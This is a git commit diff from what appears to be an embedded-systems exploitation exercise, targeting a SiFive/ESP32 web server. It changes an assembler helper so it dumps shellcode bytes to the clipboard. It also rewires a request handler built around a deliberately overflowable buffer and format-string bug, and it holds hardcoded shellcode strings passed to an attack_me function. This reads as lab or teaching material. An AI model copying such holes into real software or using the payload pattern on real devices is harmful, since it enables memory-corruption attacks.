setting up server for attack - missing html decode + auto copying bindump to...

setting up server for attack - missing html decode + auto copying bindump to clipboard from assembly.py

assembler.py

@@ -20,6 +20,7 @@ objdump = path + "/" + arch_prefix + "objdump"
 
 subprocess.run([assembler, sys.argv[1], "-march=" + march])
 with subprocess.Popen([objdump, "-D", "a.out"], stdout=subprocess.PIPE) as objdump_result:
+    with open("i_am_bin_dump", "wb") as f:
         text_start = False
 
         for line in objdump_result.stdout.read().decode("utf-8").splitlines():
@@ -36,5 +37,9 @@ with subprocess.Popen([objdump, "-D", "a.out"], stdout=subprocess.PIPE) as objdu
                     hexval.reverse()
                 instruction = " ".join(components[2:])
                 print('          "\\x%s\\x%s\\x%s\\x%s" // %s %s' % (hexval[0], hexval[1], hexval[2], hexval[3], offset, instruction))
+                for hx in hexval:
+                    f.write(bytes([int(hx, 16)]))
 
-subprocess.run(["rm", "a.out"])
+print("running xclip for hex to clipboard")
+subprocess.run(["xclip", "-selection", "clipboard", "-noutf8", "-in", "i_am_bin_dump"])
+subprocess.run(["rm", "a.out", "i_am_bin_dump"])

sifive_software/src/wifi_exploit.c

@@ -44,27 +44,6 @@
 	"    </body>\n"\
 	"</html>"
 
-char *server_request_handler(char *location, enum request_type type, char *data, uint32_t data_len, uint32_t *out_len, bool *free_result) {
-	*free_result = true;
-	if(type == GET_REQUEST && strncmp(location, "/", 2) == 0) {
-		return http_prepare_response(INDEX_PAGE, strlen(INDEX_PAGE), 200, out_len);
-	} else if(type == POST_REQUEST && strncmp(location, "/", 2) == 0) {
-		if(data_len >= 5 && strncmp(data, "name=", 5) == 0) {
-			// nobody could possibly enter a name longer than 20 characters, so this buffer
-			// is definitely large enough
-			char message[28];
-			memcpy(message, "Hallo, ", 7);
-			snprintf(message + 7, data_len - 5, &data[5]);
-			*(message + 7 + data_len - 5) = 0;
-			return http_prepare_response(message, strlen(message), 200, out_len);
-		} else {
-			return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
-		}
-	} else {
-		return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
-	}
-	return NULL;
-}
 
 char *target = "secret";
 char * get_target() {
@@ -94,6 +73,31 @@ char *attack_me(char *data, uint32_t data_len) {
 	return result;
 }
 
+char *server_request_handler(char *location, enum request_type type, char *data, uint32_t data_len, uint32_t *out_len, bool *free_result) {
+	*free_result = true;
+	if(type == GET_REQUEST && strncmp(location, "/", 2) == 0) {
+		return http_prepare_response(INDEX_PAGE, strlen(INDEX_PAGE), 200, out_len);
+	} else if(type == POST_REQUEST && strncmp(location, "/", 2) == 0) {
+		if(data_len >= 5 && strncmp(data, "name=", 5) == 0) {
+			// nobody could possibly enter a name longer than 20 characters, so this buffer
+			// is definitely large enough
+			char *return_string;
+			return_string = attack_me(data, data_len);
+
+			char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len);
+			free(return_string);
+			return response;
+		} else {
+			return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
+		}
+	} else {
+		return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
+	}
+	return NULL;
+}
+
+
+
 /*
  * 0x6
  * 0x55
@@ -154,12 +158,12 @@ int main(void) {
 
     		"\xe4\x0e\x00\x80"
     		"\xe4\x0e\x00\x80";
-    char *result = attack_me(revattack, 141);
+    //char *result = attack_me(revattack, 141);
     //char *result = attack_me(attack, 120);
 
-    printf("result: %s", result);
+    //printf("result: %s", result);
+
 
-    /*
     if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) {
     	return 1;
     }
@@ -171,7 +175,7 @@ int main(void) {
 
     LED_off(LED_BLUE);
     LED_on(LED_GREEN);
-    */
+
 
     return 0;
 }